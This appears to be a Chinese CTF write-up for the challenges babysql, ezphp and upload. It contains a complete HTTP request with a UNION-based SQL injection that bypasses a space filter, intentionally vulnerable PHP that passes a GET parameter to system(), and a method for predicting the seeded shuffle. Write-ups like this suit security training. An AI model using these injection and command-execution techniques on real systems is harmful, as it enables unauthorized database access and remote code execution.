babysql
最简单的一道,可以直接sqlmap一把梭,仅仅是ban掉了 空格,用 /**/ 代替即可
flag在 emails 表里
代码语言:javascript复制GET /search.php?id=-1/**/union/**/select/**/1,version(),group_concat(email_id)/**/from/**/emails#&search=查询 HTTP/1.1
Host: 1.14.97.218:23504
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1.14.97.218:23504/search.php?id=1' or 1=1%23&search=查询
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: td_cookie=3934571967
Connection: close
ezphp
源码
代码语言:javascript复制<?php
error_reporting(0);
highlight_file(__FILE__);
mt_srand(time());
$a = array("system",$_GET['cmd']);
for ($i=0;$i<=10000;$i ){
array_push($a,"Ctfer");
}
shuffle($a);
$a[$_GET['b']]($a[$_GET['c']]);shuffle 函数打乱数组是伪随机的,本地启个环境把时间戳种子提前几秒找到对应的下标,后续进行爆破即可
另外两道逆天的题没做出来,赛后复现
upload
黑盒测试发现只能上传 .zip 和 .rar 文件,而且无任何回显,搁着猜谜呢
扫目录扫出来 .upload.php.swo 谁家的字典这么好用啊
